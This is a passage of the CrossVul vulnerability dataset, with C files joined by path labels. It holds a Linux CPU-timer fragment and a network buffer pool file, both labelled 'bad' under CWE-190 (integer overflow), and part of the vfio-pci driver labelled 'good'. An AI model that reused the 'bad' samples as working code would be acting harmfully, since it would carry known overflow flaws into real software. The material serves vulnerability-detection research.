.clock_set = posix_cpu_clock_set,
.clock_get = posix_cpu_clock_get,
.timer_create = posix_cpu_timer_create,
.nsleep = posix_cpu_nsleep,
.timer_set = posix_cpu_timer_set,
.timer_del = posix_cpu_timer_del,
.timer_get = posix_cpu_timer_get,
.timer_rearm = posix_cpu_timer_rearm,
};
const struct k_clock clock_process = {
.clock_getres = process_cpu_clock_getres,
.clock_get = process_cpu_clock_get,
.timer_create = process_cpu_timer_create,
.nsleep = process_cpu_nsleep,
};
const struct k_clock clock_thread = {
.clock_getres = thread_cpu_clock_getres,
.clock_get = thread_cpu_clock_get,
.timer_create = thread_cpu_timer_create,
};
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_207_1 |
crossvul-cpp_data_bad_400_0 | /*
* Description: network buf manager
* History: yang@haipo.me, 2016/03/16, create
*/
# include <errno.h>
# include <string.h>
# include "nw_buf.h"
# define NW_BUF_POOL_INIT_SIZE 64
# define NW_CACHE_INIT_SIZE 64
size_t nw_buf_size(nw_buf *buf)
{
return buf->wpos - buf->rpos;
}
size_t nw_buf_avail(nw_buf *buf)
{
return buf->size - buf->wpos;
}
size_t nw_buf_write(nw_buf *buf, const void *data, size_t len)
{
size_t available = buf->size - buf->wpos;
size_t wlen = len > available ? available : len;
memcpy(buf->data + buf->wpos, data, wlen);
buf->wpos += wlen;
return wlen;
}
void nw_buf_shift(nw_buf *buf)
{
if (buf->rpos == buf->wpos) {
buf->rpos = buf->wpos = 0;
} else if (buf->rpos != 0) {
memmove(buf->data, buf->data + buf->rpos, buf->wpos - buf->rpos);
buf->wpos -= buf->rpos;
buf->rpos = 0;
}
}
nw_buf_pool *nw_buf_pool_create(uint32_t size)
{
nw_buf_pool *pool = malloc(sizeof(nw_buf_pool));
if (pool == NULL)
return NULL;
pool->size = size;
pool->used = 0;
pool->free = 0;
pool->free_total = NW_BUF_POOL_INIT_SIZE;
pool->free_arr = malloc(pool->free_total * sizeof(nw_buf *));
if (pool->free_arr == NULL) {
free(pool);
return NULL;
}
return pool;
}
nw_buf *nw_buf_alloc(nw_buf_pool *pool)
{
if (pool->free) {
nw_buf *buf = pool->free_arr[--pool->free];
buf->size = pool->size;
buf->rpos = 0;
buf->wpos = 0;
buf->next = NULL;
return buf;
}
nw_buf *buf = malloc(sizeof(nw_buf) + pool->size);
if (buf == NULL)
return NULL;
buf->size = pool->size;
buf->rpos = 0;
buf->wpos = 0;
buf->next = NULL;
return buf;
}
void nw_buf_free(nw_buf_pool *pool, nw_buf *buf)
{
if (pool->free < pool->free_total) {
pool->free_arr[pool->free++] = buf;
} else {
uint32_t new_free_total = pool->free_total * 2;
void *new_arr = realloc(pool->free_arr, new_free_total * sizeof(nw_buf *));
if (new_arr) {
pool->free_total = new_free_total;
pool->free_arr = new_arr;
pool->free_arr[pool->free++] = buf;
} else {
free(buf);
}
}
}
void nw_buf_pool_release(nw_buf_pool *pool)
{
for (uint32_t i = 0; i < pool->free; ++i) {
free(pool->free_arr[i]);
}
free(pool->free_arr);
free(pool);
}
nw_buf_list *nw_buf_list_create(nw_buf_pool *pool, uint32_t limit)
{
nw_buf_list *list = malloc(sizeof(nw_buf_list));
if (list == NULL)
return NULL;
list->pool = pool;
list->count = 0;
list->limit = limit;
list->head = NULL;
list->tail = NULL;
return list;
}
size_t nw_buf_list_write(nw_buf_list *list, const void *data, size_t len)
{
const void *pos = data;
size_t left = len;
if (list->tail && nw_buf_avail(list->tail)) {
size_t ret = nw_buf_write(list->tail, pos, left);
left -= ret;
pos += ret;
}
while (left) {
if (list->limit && list->count >= list->limit)
return len - left;
nw_buf *buf = nw_buf_alloc(list->pool);
if (buf == NULL)
return len - left;
if (list->head == NULL)
list->head = buf;
if (list->tail != NULL)
list->tail->next = buf;
list->tail = buf;
list->count++;
size_t ret = nw_buf_write(list->tail, pos, left);
left -= ret;
pos += ret;
}
return len;
}
size_t nw_buf_list_append(nw_buf_list *list, const void *data, size_t len)
{
if (list->limit && list->count >= list->limit)
return 0;
nw_buf *buf = nw_buf_alloc(list->pool);
if (buf == NULL)
return 0;
if (len > buf->size) {
nw_buf_free(list->pool, buf);
return 0;
}
nw_buf_write(buf, data, len);
if (list->head == NULL)
list->head = buf;
if (list->tail != NULL)
list->tail->next = buf;
list->tail = buf;
list->count++;
return len;
}
void nw_buf_list_shift(nw_buf_list *list)
{
if (list->head) {
nw_buf *tmp = list->head;
list->head = tmp->next;
if (list->head == NULL) {
list->tail = NULL;
}
list->count--;
nw_buf_free(list->pool, tmp);
}
}
void nw_buf_list_release(nw_buf_list *list)
{
nw_buf *curr = list->head;
nw_buf *next = NULL;
while (curr) {
next = curr->next;
nw_buf_free(list->pool, curr);
curr = next;
}
free(list);
}
nw_cache *nw_cache_create(uint32_t size)
{
nw_cache *cache = malloc(sizeof(nw_cache));
if (cache == NULL)
return NULL;
cache->size = size;
cache->used = 0;
cache->free = 0;
cache->free_total = NW_CACHE_INIT_SIZE;
cache->free_arr = malloc(cache->free_total * sizeof(void *));
if (cache->free_arr == NULL) {
free(cache);
return NULL;
}
return cache;
}
void *nw_cache_alloc(nw_cache *cache)
{
if (cache->free)
return cache->free_arr[--cache->free];
return malloc(cache->size);
}
void nw_cache_free(nw_cache *cache, void *obj)
{
if (cache->free < cache->free_total) {
cache->free_arr[cache->free++] = obj;
} else {
uint32_t new_free_total = cache->free_total * 2;
void *new_arr = realloc(cache->free_arr, new_free_total * sizeof(void *));
if (new_arr) {
cache->free_total = new_free_total;
cache->free_arr = new_arr;
cache->free_arr[cache->free++] = obj;
} else {
free(obj);
}
}
}
void nw_cache_release(nw_cache *cache)
{
for (uint32_t i = 0; i < cache->free; ++i) {
free(cache->free_arr[i]);
}
free(cache->free_arr);
free(cache);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_400_0 |
crossvul-cpp_data_good_5375_0 | /*
* Copyright (C) 2012 Red Hat, Inc. All rights reserved.
* Author: Alex Williamson <alex.williamson@redhat.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* Derived from original vfio:
* Copyright 2010 Cisco Systems, Inc. All rights reserved.
* Author: Tom Lyon, pugs@cisco.com
*/
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/device.h>
#include <linux/eventfd.h>
#include <linux/file.h>
#include <linux/interrupt.h>
#include <linux/iommu.h>
#include <linux/module.h>
#include <linux/mutex.h>
#include <linux/notifier.h>
#include <linux/pci.h>
#include <linux/pm_runtime.h>
#include <linux/slab.h>
#include <linux/types.h>
#include <linux/uaccess.h>
#include <linux/vfio.h>
#include <linux/vgaarb.h>
#include "vfio_pci_private.h"
#define DRIVER_VERSION "0.2"
#define DRIVER_AUTHOR "Alex Williamson <alex.williamson@redhat.com>"
#define DRIVER_DESC "VFIO PCI - User Level meta-driver"
static char ids[1024] __initdata;
module_param_string(ids, ids, sizeof(ids), 0);
MODULE_PARM_DESC(ids, "Initial PCI IDs to add to the vfio driver, format is \"vendor:device[:subvendor[:subdevice[:class[:class_mask]]]]\" and multiple comma separated entries can be specified");
static bool nointxmask;
module_param_named(nointxmask, nointxmask, bool, S_IRUGO | S_IWUSR);
MODULE_PARM_DESC(nointxmask,
"Disable support for PCI 2.3 style INTx masking. If this resolves problems for specific devices, report lspci -vvvxxx to linux-pci@vger.kernel.org so the device can be fixed automatically via the broken_intx_masking flag.");
#ifdef CONFIG_VFIO_PCI_VGA
static bool disable_vga;
module_param(disable_vga, bool, S_IRUGO);
MODULE_PARM_DESC(disable_vga, "Disable VGA resource access through vfio-pci");
#endif
static bool disable_idle_d3;
module_param(disable_idle_d3, bool, S_IRUGO | S_IWUSR);
MODULE_PARM_DESC(disable_idle_d3,
"Disable using the PCI D3 low power state for idle, unused devices");
static DEFINE_MUTEX(driver_lock);
static inline bool vfio_vga_disabled(void)
{
#ifdef CONFIG_VFIO_PCI_VGA
return disable_vga;
#else
return true;
#endif
}
/*
* Our VGA arbiter participation is limited since we don't know anything
* about the device itself. However, if the device is the only VGA device
* downstream of a bridge and VFIO VGA support is disabled, then we can
* safely return legacy VGA IO and memory as not decoded since the user
* has no way to get to it and routing can be disabled externally at the
* bridge.
*/
static unsigned int vfio_pci_set_vga_decode(void *opaque, bool single_vga)
{
struct vfio_pci_device *vdev = opaque;
struct pci_dev *tmp = NULL, *pdev = vdev->pdev;
unsigned char max_busnr;
unsigned int decodes;
if (single_vga || !vfio_vga_disabled() || pci_is_root_bus(pdev->bus))
return VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM |
VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM;
max_busnr = pci_bus_max_busnr(pdev->bus);
decodes = VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM;
while ((tmp = pci_get_class(PCI_CLASS_DISPLAY_VGA << 8, tmp)) != NULL) {
if (tmp == pdev ||
pci_domain_nr(tmp->bus) != pci_domain_nr(pdev->bus) ||
pci_is_root_bus(tmp->bus))
continue;
if (tmp->bus->number >= pdev->bus->number &&
tmp->bus->number <= max_busnr) {
pci_dev_put(tmp);
decodes |= VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM;
break;
}
}
return decodes;
}
static inline bool vfio_pci_is_vga(struct pci_dev *pdev)
{
return (pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA;
}
static void vfio_pci_probe_mmaps(struct vfio_pci_device *vdev)
{
struct resource *res;
int bar;
struct vfio_pci_dummy_resource *dummy_res;
INIT_LIST_HEAD(&vdev->dummy_resources_list);
for (bar = PCI_STD_RESOURCES; bar <= PCI_STD_RESOURCE_END; bar++) {
res = vdev->pdev->resource + bar;
if (!IS_ENABLED(CONFIG_VFIO_PCI_MMAP))
goto no_mmap;
if (!(res->flags & IORESOURCE_MEM))
goto no_mmap;
/*
* The PCI core shouldn't set up a resource with a
* type but zero size. But there may be bugs that
* cause us to do that.
*/
if (!resource_size(res))
goto no_mmap;
if (resource_size(res) >= PAGE_SIZE) {
vdev->bar_mmap_supported[bar] = true;
continue;
}
if (!(res->start & ~PAGE_MASK)) {
/*
* Add a dummy resource to reserve the remainder
* of the exclusive page in case that hot-add
* device's bar is assigned into it.
*/
dummy_res = kzalloc(sizeof(*dummy_res), GFP_KERNEL);
if (dummy_res == NULL)
goto no_mmap;
dummy_res->resource.name = "vfio sub-page reserved";
dummy_res->resource.start = res->end + 1;
dummy_res->resource.end = res->start + PAGE_SIZE - 1;
dummy_res->resource.flags = res->flags;
if (request_resource(res->parent,
&dummy_res->resource)) {
kfree(dummy_res);
goto no_mmap;
}
dummy_res->index = bar;
list_add(&dummy_res->res_next,
&vdev->dummy_resources_list);
vdev->bar_mmap_supported[bar] = true;
continue;
}
/*
* Here we don't handle the case when the BAR is not page
* aligned because we can't expect the BAR will be
* assigned into the same location in a page in guest
* when we passthrough the BAR. And it's hard to access
* this BAR in userspace because we have no way to get
* the BAR's location in a page.
*/
no_mmap:
vdev->bar_mmap_supported[bar] = false;
}
}
static void vfio_pci_try_bus_reset(struct vfio_pci_device *vdev);
static void vfio_pci_disable(struct vfio_pci_device *vdev);
/*
* INTx masking requires the ability to disable INTx signaling via PCI_COMMAND
* _and_ the ability detect when the device is asserting INTx via PCI_STATUS.
* If a device implements the former but not the latter we would typically
* expect broken_intx_masking be set and require an exclusive interrupt.
* However since we do have control of the device's ability to assert INTx,
* we can instead pretend that the device does not implement INTx, virtualizing
* the pin register to report zero and maintaining DisINTx set on the host.
*/
static bool vfio_pci_nointx(struct pci_dev *pdev)
{
switch (pdev->vendor) {
case PCI_VENDOR_ID_INTEL:
switch (pdev->device) {
/* All i40e (XL710/X710) 10/20/40GbE NICs */
case 0x1572:
case 0x1574:
case 0x1580 ... 0x1581:
case 0x1583 ... 0x1589:
case 0x37d0 ... 0x37d2:
return true;
default:
return false;
}
}
return false;
}
static int vfio_pci_enable(struct vfio_pci_device *vdev)
{
struct pci_dev *pdev = vdev->pdev;
int ret;
u16 cmd;
u8 msix_pos;
pci_set_power_state(pdev, PCI_D0);
/* Don't allow our initial saved state to include busmaster */
pci_clear_master(pdev);
ret = pci_enable_device(pdev);
if (ret)
return ret;
vdev->reset_works = (pci_reset_function(pdev) == 0);
pci_save_state(pdev);
vdev->pci_saved_state = pci_store_saved_state(pdev);
if (!vdev->pci_saved_state)
pr_debug("%s: Couldn't store %s saved state\n",
__func__, dev_name(&pdev->dev));
if (likely(!nointxmask)) {
if (vfio_pci_nointx(pdev)) {
dev_info(&pdev->dev, "Masking broken INTx support\n");
vdev->nointx = true;
pci_intx(pdev, 0);
} else
vdev->pci_2_3 = pci_intx_mask_supported(pdev);
}
pci_read_config_word(pdev, PCI_COMMAND, &cmd);
if (vdev->pci_2_3 && (cmd & PCI_COMMAND_INTX_DISABLE)) {
cmd &= ~PCI_COMMAND_INTX_DISABLE;
pci_write_config_word(pdev, PCI_COMMAND, cmd);
}
ret = vfio_config_init(vdev);
if (ret) {
kfree(vdev->pci_saved_state);
vdev->pci_saved_state = NULL;
pci_disable_device(pdev);
return ret;
}
msix_pos = pdev->msix_cap;
if (msix_pos) {
u16 flags;
u32 table;
pci_read_config_word(pdev, msix_pos + PCI_MSIX_FLAGS, &flags);
pci_read_config_dword(pdev, msix_pos + PCI_MSIX_TABLE, &table);
vdev->msix_bar = table & PCI_MSIX_TABLE_BIR;
vdev->msix_offset = table & PCI_MSIX_TABLE_OFFSET;
vdev->msix_size = ((flags & PCI_MSIX_FLAGS_QSIZE) + 1) * 16;
} else
vdev->msix_bar = 0xFF;
if (!vfio_vga_disabled() && vfio_pci_is_vga(pdev))
vdev->has_vga = true;
if (vfio_pci_is_vga(pdev) &&
pdev->vendor == PCI_VENDOR_ID_INTEL &&
IS_ENABLED(CONFIG_VFIO_PCI_IGD)) {
ret = vfio_pci_igd_init(vdev);
if (ret) {
dev_warn(&vdev->pdev->dev,
"Failed to setup Intel IGD regions\n");
vfio_pci_disable(vdev);
return ret;
}
}
vfio_pci_probe_mmaps(vdev);
return 0;
}
static void vfio_pci_disable(struct vfio_pci_device *vdev)
{
struct pci_dev *pdev = vdev->pdev;
struct vfio_pci_dummy_resource *dummy_res, *tmp;
int i, bar;
/* Stop the device from further DMA */
pci_clear_master(pdev);
vfio_pci_set_irqs_ioctl(vdev, VFIO_IRQ_SET_DATA_NONE |
VFIO_IRQ_SET_ACTION_TRIGGER,
vdev->irq_type, 0, 0, NULL);
vdev->virq_disabled = false;
for (i = 0; i < vdev->num_regions; i++)
vdev->region[i].ops->release(vdev, &vdev->region[i]);
vdev->num_regions = 0;
kfree(vdev->region);
vdev->region = NULL; /* don't krealloc a freed pointer */
vfio_config_free(vdev);
for (bar = PCI_STD_RESOURCES; bar <= PCI_STD_RESOURCE_END; bar++) {
if (!vdev->barmap[bar])
continue;
pci_iounmap(pdev, vdev->barmap[bar]);
pci_release_selected_regions(pdev, 1 << bar);
vdev->barmap[bar] = NULL;
}
list_for_each_entry_safe(dummy_res, tmp,
&vdev->dummy_resources_list, res_next) {
list_del(&dummy_res->res_next);
release_resource(&dummy_res->resource);
kfree(dummy_res);
}
vdev->needs_reset = true;
/*
* If we have saved state, restore it. If we can reset the device,
* even better. Resetting with current state seems better than
* nothing, but saving and restoring current state without reset
* is just busy work.
*/
if (pci_load_and_free_saved_state(pdev, &vdev->pci_saved_state)) {
pr_info("%s: Couldn't reload %s saved state\n",
__func__, dev_name(&pdev->dev));
if (!vdev->reset_works)
goto out;
pci_save_state(pdev);
}
/*
* Disable INTx and MSI, presumably to avoid spurious interrupts
* during reset. Stolen from pci_reset_function()
*/
pci_write_config_word(pdev, PCI_COMMAND, PCI_COMMAND_INTX_DISABLE);
/*
* Try to reset the device. The success of this is dependent on
* being able to lock the device, which is not always possible.
*/
if (vdev->reset_works && !pci_try_reset_function(pdev))
vdev->needs_reset = false;
pci_restore_state(pdev);
out:
pci_disable_device(pdev);
vfio_pci_try_bus_reset(vdev);
if (!disable_idle_d3)
pci_set_power_state(pdev, PCI_D3hot);
}
static void vfio_pci_release(void *device_data)
{
struct vfio_pci_device *vdev = device_data;
mutex_lock(&driver_lock);
if (!(--vdev->refcnt)) {
vfio_spapr_pci_eeh_release(vdev->pdev);
vfio_pci_disable(vdev);
}
mutex_unlock(&driver_lock);
module_put(THIS_MODULE);
}
static int vfio_pci_open(void *device_data)
{
struct vfio_pci_device *vdev = device_data;
int ret = 0;
if (!try_module_get(THIS_MODULE))
return -ENODEV;
mutex_lock(&driver_lock);
if (!vdev->refcnt) {
ret = vfio_pci_enable(vdev);
if (ret)
goto error;
vfio_spapr_pci_eeh_open(vdev->pdev);
}
vdev->refcnt++;
error:
mutex_unlock(&driver_lock);
if (ret)
module_put(THIS_MODULE);
return ret;
}
static int vfio_pci_get_irq_count(struct vfio_pci_device *vdev, int irq_type)
{
if (irq_type == VFIO_PCI_INTX_IRQ_INDEX) {
u8 pin;
pci_read_config_byte(vdev->pdev, PCI_INTERRUPT_PIN, &pin);
if (IS_ENABLED(CONFIG_VFIO_PCI_INTX) && !vdev->nointx && pin)
return 1;
} else if (irq_type == VFIO_PCI_MSI_IRQ_INDEX) {
u8 pos;
u16 flags;
pos = vdev->pdev->msi_cap;
if (pos) {
pci_read_config_word(vdev->pdev,
pos + PCI_MSI_FLAGS, &flags);
return 1 << ((flags & PCI_MSI_FLAGS_QMASK) >> 1);
}
} else if (irq_type == VFIO_PCI_MSIX_IRQ_INDEX) {
u8 pos;
u16 flags;
pos = vdev->pdev->msix_cap;
if (pos) {
pci_read_config_word(vdev->pdev,
pos + PCI_MSIX_FLAGS, &flags);
return (flags & PCI_MSIX_FLAGS_QSIZE) + 1;
}
} else if (irq_type == VFIO_PCI_ERR_IRQ_INDEX) {
if (pci_is_pcie(vdev->pdev))
return 1;
} else if (irq_type == VFIO_PCI_REQ_IRQ_INDEX) {
return 1;
}
return 0;
}
static int vfio_pci_count_devs(struct pci_dev *pdev, void *data)
{
(*(int *)data)++;
return 0;
}
struct vfio_pci_fill_info {
int max;
int cur;
struct vfio_pci_dependent_device *devices;
};
static int vfio_pci_fill_devs(struct pci_dev *pdev, void *data)
{
struct vfio_pci_fill_info *fill = data;
struct iommu_group *iommu_group;
if (fill->cur == fill->max)
return -EAGAIN; /* Something changed, try again */
iommu_group = iommu_group_get(&pdev->dev);
if (!iommu_group)
return -EPERM; /* Cannot reset non-isolated devices */
fill->devices[fill->cur].group_id = iommu_group_id(iommu_group);
fill->devices[fill->cur].segment = pci_domain_nr(pdev->bus);
fill->devices[fill->cur].bus = pdev->bus->number;
fill->devices[fill->cur].devfn = pdev->devfn;
fill->cur++;
iommu_group_put(iommu_group);
return 0;
}
struct vfio_pci_group_entry {
struct vfio_group *group;
int id;
};
struct vfio_pci_group_info {
int count;
struct vfio_pci_group_entry *groups;
};
static int vfio_pci_validate_devs(struct pci_dev *pdev, void *data)
{
struct vfio_pci_group_info *info = data;
struct iommu_group *group;
int id, i;
group = iommu_group_get(&pdev->dev);
if (!group)
return -EPERM;
id = iommu_group_id(group);
for (i = 0; i < info->count; i++)
if (info->groups[i].id == id)
break;
iommu_group_put(group);
return (i == info->count) ? -EINVAL : 0;
}
static bool vfio_pci_dev_below_slot(struct pci_dev *pdev, struct pci_slot *slot)
{
for (; pdev; pdev = pdev->bus->self)
if (pdev->bus == slot->bus)
return (pdev->slot == slot);
return false;
}
struct vfio_pci_walk_info {
int (*fn)(struct pci_dev *, void *data);
void *data;
struct pci_dev *pdev;
bool slot;
int ret;
};
static int vfio_pci_walk_wrapper(struct pci_dev *pdev, void *data)
{
struct vfio_pci_walk_info *walk = data;
if (!walk->slot || vfio_pci_dev_below_slot(pdev, walk->pdev->slot))
walk->ret = walk->fn(pdev, walk->data);
return walk->ret;
}
static int vfio_pci_for_each_slot_or_bus(struct pci_dev *pdev,
int (*fn)(struct pci_dev *,
void *data), void *data,
bool slot)
{
struct vfio_pci_walk_info walk = {
.fn = fn, .data = data, .pdev = pdev, .slot = slot, .ret = 0,
};
pci_walk_bus(pdev->bus, vfio_pci_walk_wrapper, &walk);
return walk.ret;
}
static int msix_sparse_mmap_cap(struct vfio_pci_device *vdev,
struct vfio_info_cap *caps)
{
struct vfio_info_cap_header *header;
struct vfio_region_info_cap_sparse_mmap *sparse;
size_t end, size;
int nr_areas = 2, i = 0;
end = pci_resource_len(vdev->pdev, vdev->msix_bar);
/* If MSI-X table is aligned to the start or end, only one area */
if (((vdev->msix_offset & PAGE_MASK) == 0) ||
(PAGE_ALIGN(vdev->msix_offset + vdev->msix_size) >= end))
nr_areas = 1;
size = sizeof(*sparse) + (nr_areas * sizeof(*sparse->areas));
header = vfio_info_cap_add(caps, size,
VFIO_REGION_INFO_CAP_SPARSE_MMAP, 1);
if (IS_ERR(header))
return PTR_ERR(header);
sparse = container_of(header,
struct vfio_region_info_cap_sparse_mmap, header);
sparse->nr_areas = nr_areas;
if (vdev->msix_offset & PAGE_MASK) {
sparse->areas[i].offset = 0;
sparse->areas[i].size = vdev->msix_offset & PAGE_MASK;
i++;
}
if (PAGE_ALIGN(vdev->msix_offset + vdev->msix_size) < end) {
sparse->areas[i].offset = PAGE_ALIGN(vdev->msix_offset +
vdev->msix_size);
sparse->areas[i].size = end - sparse->areas[i].offset;
i++;
}
return 0;
}
static int region_type_cap(struct vfio_pci_device *vdev,
struct vfio_info_cap *caps,
unsigned int type, unsigned int subtype)
{
struct vfio_info_cap_header *header;
struct vfio_region_info_cap_type *cap;
header = vfio_info_cap_add(caps, sizeof(*cap),
VFIO_REGION_INFO_CAP_TYPE, 1);
if (IS_ERR(header))
return PTR_ERR(header);
cap = container_of(header, struct vfio_region_info_cap_type, header);
cap->type = type;
cap->subtype = subtype;
return 0;
}
int vfio_pci_register_dev_region(struct vfio_pci_device *vdev,
unsigned int type, unsigned int subtype,
const struct vfio_pci_regops *ops,
size_t size, u32 flags, void *data)
{
struct vfio_pci_region *region;
region = krealloc(vdev->region,
(vdev->num_regions + 1) * sizeof(*region),
GFP_KERNEL);
if (!region)
return -ENOMEM;
vdev->region = region;
vdev->region[vdev->num_regions].type = type;
vdev->region[vdev->num_regions].subtype = subtype;
vdev->region[vdev->num_regions].ops = ops;
vdev->region[vdev->num_regions].size = size;
vdev->region[vdev->num_regions].flags = flags;
vdev->region[vdev->num_regions].data = data;
vdev->num_regions++;
return 0;
}
static long vfio_pci_ioctl(void *device_data,
unsigned int cmd, unsigned long arg)
{
struct vfio_pci_device *vdev = device_data;
unsigned long minsz;
if (cmd == VFIO_DEVICE_GET_INFO) {
struct vfio_device_info info;
minsz = offsetofend(struct vfio_device_info, num_irqs);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz)
return -EINVAL;
info.flags = VFIO_DEVICE_FLAGS_PCI;
if (vdev->reset_works)
info.flags |= VFIO_DEVICE_FLAGS_RESET;
info.num_regions = VFIO_PCI_NUM_REGIONS + vdev->num_regions;
info.num_irqs = VFIO_PCI_NUM_IRQS;
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_GET_REGION_INFO) {
struct pci_dev *pdev = vdev->pdev;
struct vfio_region_info info;
struct vfio_info_cap caps = { .buf = NULL, .size = 0 };
int i, ret;
minsz = offsetofend(struct vfio_region_info, offset);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz)
return -EINVAL;
switch (info.index) {
case VFIO_PCI_CONFIG_REGION_INDEX:
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = pdev->cfg_size;
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
break;
case VFIO_PCI_BAR0_REGION_INDEX ... VFIO_PCI_BAR5_REGION_INDEX:
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = pci_resource_len(pdev, info.index);
if (!info.size) {
info.flags = 0;
break;
}
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
if (vdev->bar_mmap_supported[info.index]) {
info.flags |= VFIO_REGION_INFO_FLAG_MMAP;
if (info.index == vdev->msix_bar) {
ret = msix_sparse_mmap_cap(vdev, &caps);
if (ret)
return ret;
}
}
break;
case VFIO_PCI_ROM_REGION_INDEX:
{
void __iomem *io;
size_t size;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.flags = 0;
/* Report the BAR size, not the ROM size */
info.size = pci_resource_len(pdev, info.index);
if (!info.size) {
/* Shadow ROMs appear as PCI option ROMs */
if (pdev->resource[PCI_ROM_RESOURCE].flags &
IORESOURCE_ROM_SHADOW)
info.size = 0x20000;
else
break;
}
/* Is it really there? */
io = pci_map_rom(pdev, &size);
if (!io || !size) {
info.size = 0;
break;
}
pci_unmap_rom(pdev, io);
info.flags = VFIO_REGION_INFO_FLAG_READ;
break;
}
case VFIO_PCI_VGA_REGION_INDEX:
if (!vdev->has_vga)
return -EINVAL;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = 0xc0000;
info.flags = VFIO_REGION_INFO_FLAG_READ |
VFIO_REGION_INFO_FLAG_WRITE;
break;
default:
if (info.index >=
VFIO_PCI_NUM_REGIONS + vdev->num_regions)
return -EINVAL;
i = info.index - VFIO_PCI_NUM_REGIONS;
info.offset = VFIO_PCI_INDEX_TO_OFFSET(info.index);
info.size = vdev->region[i].size;
info.flags = vdev->region[i].flags;
ret = region_type_cap(vdev, &caps,
vdev->region[i].type,
vdev->region[i].subtype);
if (ret)
return ret;
}
if (caps.size) {
info.flags |= VFIO_REGION_INFO_FLAG_CAPS;
if (info.argsz < sizeof(info) + caps.size) {
info.argsz = sizeof(info) + caps.size;
info.cap_offset = 0;
} else {
vfio_info_cap_shift(&caps, sizeof(info));
if (copy_to_user((void __user *)arg +
sizeof(info), caps.buf,
caps.size)) {
kfree(caps.buf);
return -EFAULT;
}
info.cap_offset = sizeof(info);
}
kfree(caps.buf);
}
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_GET_IRQ_INFO) {
struct vfio_irq_info info;
minsz = offsetofend(struct vfio_irq_info, count);
if (copy_from_user(&info, (void __user *)arg, minsz))
return -EFAULT;
if (info.argsz < minsz || info.index >= VFIO_PCI_NUM_IRQS)
return -EINVAL;
switch (info.index) {
case VFIO_PCI_INTX_IRQ_INDEX ... VFIO_PCI_MSIX_IRQ_INDEX:
case VFIO_PCI_REQ_IRQ_INDEX:
break;
case VFIO_PCI_ERR_IRQ_INDEX:
if (pci_is_pcie(vdev->pdev))
break;
/* pass thru to return error */
default:
return -EINVAL;
}
info.flags = VFIO_IRQ_INFO_EVENTFD;
info.count = vfio_pci_get_irq_count(vdev, info.index);
if (info.index == VFIO_PCI_INTX_IRQ_INDEX)
info.flags |= (VFIO_IRQ_INFO_MASKABLE |
VFIO_IRQ_INFO_AUTOMASKED);
else
info.flags |= VFIO_IRQ_INFO_NORESIZE;
return copy_to_user((void __user *)arg, &info, minsz) ?
-EFAULT : 0;
} else if (cmd == VFIO_DEVICE_SET_IRQS) {
struct vfio_irq_set hdr;
size_t size;
u8 *data = NULL;
int max, ret = 0;
minsz = offsetofend(struct vfio_irq_set, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz || hdr.index >= VFIO_PCI_NUM_IRQS ||
hdr.count >= (U32_MAX - hdr.start) ||
hdr.flags & ~(VFIO_IRQ_SET_DATA_TYPE_MASK |
VFIO_IRQ_SET_ACTION_TYPE_MASK))
return -EINVAL;
max = vfio_pci_get_irq_count(vdev, hdr.index);
if (hdr.start >= max || hdr.start + hdr.count > max)
return -EINVAL;
switch (hdr.flags & VFIO_IRQ_SET_DATA_TYPE_MASK) {
case VFIO_IRQ_SET_DATA_NONE:
size = 0;
break;
case VFIO_IRQ_SET_DATA_BOOL:
size = sizeof(uint8_t);
break;
case VFIO_IRQ_SET_DATA_EVENTFD:
size = sizeof(int32_t);
break;
default:
return -EINVAL;
}
if (size) {
if (hdr.argsz - minsz < hdr.count * size)
return -EINVAL;
data = memdup_user((void __user *)(arg + minsz),
hdr.count * size);
if (IS_ERR(data))
return PTR_ERR(data);
}
mutex_lock(&vdev->igate);
ret = vfio_pci_set_irqs_ioctl(vdev, hdr.flags, hdr.index,
hdr.start, hdr.count, data);
mutex_unlock(&vdev->igate);
kfree(data);
return ret;
} else if (cmd == VFIO_DEVICE_RESET) {
return vdev->reset_works ?
pci_try_reset_function(vdev->pdev) : -EINVAL;
} else if (cmd == VFIO_DEVICE_GET_PCI_HOT_RESET_INFO) {
struct vfio_pci_hot_reset_info hdr;
struct vfio_pci_fill_info fill = { 0 };
struct vfio_pci_dependent_device *devices = NULL;
bool slot = false;
int ret = 0;
minsz = offsetofend(struct vfio_pci_hot_reset_info, count);
if (copy_from_user(&hdr, (void __user *)arg, minsz))
return -EFAULT;
if (hdr.argsz < minsz)
return -EINVAL;
hdr.flags = 0;
/* Can we do a slot or bus reset or neither? */
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return -ENODEV;
/* How many devices are affected? */
ret = vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_count_devs,
&fill.max, slot);
if (ret)
return ret;
WARN_ON(!fill.max); /* Should always be at least one */
/*
* If there's enough space, fill it now, otherwise return
* -ENOSPC and the number of devices affected.
*/
if (hdr.argsz < sizeof(hdr) + (fill.max * sizeof(*devices))) {
ret = -ENOSPC;
hdr.count = fill.max;
goto reset_info_exit;
}
